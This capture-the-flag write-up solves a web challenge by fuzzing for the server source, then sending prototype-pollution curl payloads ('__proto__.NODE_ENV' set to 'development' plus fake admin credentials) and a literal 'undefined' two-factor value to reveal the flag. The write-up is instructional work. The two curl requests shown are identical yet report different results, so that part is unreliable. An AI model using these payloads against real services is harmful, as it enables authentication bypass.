express-it

This challenge presents itself as a single web page. Fuzzing the endpoint http://expressit.83f784ae.quals.sigint.mx/ reveals the source code for the web server at /source.

% ffuf -w /usr/share/dict/directory-list-2.3-medium.txt -u http://expressit.83f784ae.quals.sigint.mx/FUZZ  


        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0
________________________________________________

 :: Method           : GET
 :: URL              : http://expressit.83f784ae.quals.sigint.mx/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dict/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

source                  [Status: 200, Size: 1795, Words: 322, Lines: 77, Duration: 53ms]
[...]

That yields the following Node program.

const express = require("express");
const bodyParser = require("body-parser");
const { unflatten } = require("arr-flatten-unflatten");
const fs = require("fs");
const private = require("./private.js");

const app = express();
const port = 80;
app.use(bodyParser.json());

const makeid = (length) => {
  let result = "";
  const characters =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  const charactersLength = characters.length;
  let counter = 0;
  while (counter < length) {
    result += characters.charAt(Math.floor(Math.random() * charactersLength));
    counter += 1;
  }
  return result;
};

const admin = {
  username: "admin",
  password: makeid(512),
};

app.listen(port, () => {
  console.log(`Listening on port ${port}`);
});

app.get("/", (req, res) => {
  res.send("Hello World!");
});

app.post("/login", (req, res) => {
  try {
    let credentials = unflatten(req.body);
    let development = process.env.NODE_ENV === "development" || false;

    if (
      credentials.username !==
        (development ? process.env.ADMIN_USERNAME : admin.username) ||
      credentials.password !==
        (development ? process.env.ADMIN_PASSWORD : admin.password)
    ) {
      res.send("Invalid credentials!");
      return;
    }

    if (
      !credentials.twofactor ||
      credentials.twofactor.length < 6 ||
      String(credentials.twofactor) !== String(admin.twofactor)
    ) {
      res.send("Invalid two factor!");
      return;
    }

    fs.readFile("flag.txt", "utf8", (err, data) => {
      if (err) {
        console.error(err);
        res.send("Error reading flag!");
      } else {
        res.send(`Flag: ${data}`);
      }
    });
  } finally {
    private.end();
  }
});

app.get("/source", (req, res) => {
  res.sendFile(__filename);
});

Prototype pollution

Looking at the dependencies, the arr-flatten-unflatten package has a prototype pollution vulnerability. This, in conjunction with the logic which switches to matching the username and password credentials if NODE_ENV is set to development can be exploited to bypass the invalid credentials check.

% curl -X POST -H 'Content-Type: application/json' http://expressit.83f784ae.quals.sigint.mx/login -d '{
    "__proto__.NODE_ENV": "development", 
    "__proto__.ADMIN_USERNAME": "admin", 
    "__proto__.ADMIN_PASSWORD": "a", 
    "username": "admin", 
    "password": "a",
    "twofactor": "undefined"
}'
Invalid two factor!

This works because JavaScript objects inherit properties from something called prototypes. Essentially, when a property is looked up on an object, if the object itself does not contain the property then the prototype object for that object is looked up. This is referred to as a prototype chain. By convention, the last element of the chain is Object.prototype, after which there are no more prototypes. When an object is constructed, its prototype is specified by the __proto__ property.

The vulnerability in this package lets us "pollute" the prototype object used by all JavaScript objects, including importantly process.env. Passing a payload like "__proto__.a": "b" allows us to set the property a on process.env, if it is not already defined. Thus, we use this in the request above to set NODE_ENV to development, which makes the program compare our credentials to process.env, allowing us to use our own made-up credentials.

The second part of this challenge is to bypass the two factor check. Recall earlier in the program the admin object is hardcoded with a username and password property. Missing is the twofactor property which the program tries to check against.

const admin = {
  username: "admin",
  password: makeid(512),
};

// ...

app.post("/login", (req, res) => {
    let credentials = unflatten(req.body);

    // ... 

    if (
      !credentials.twofactor ||
      credentials.twofactor.length < 6 ||
      String(credentials.twofactor) !== String(admin.twofactor)
    ) {
      res.send("Invalid two factor!");
      return;
    }

    // ...
})

This means the string it compares against will always be the literal "undefined". Adding this field to our curl request returns the flag.

% curl -X POST -H 'Content-Type: application/json' http://expressit.83f784ae.quals.sigint.mx/login -d '{
    "__proto__.NODE_ENV": "development", 
    "__proto__.ADMIN_USERNAME": "admin", 
    "__proto__.ADMIN_PASSWORD": "a", 
    "username": "admin", 
    "password": "a",
    "twofactor": "undefined"
}'
Flag: FLAG{4ND_W3_L3V3L_UP_8F83C9BC}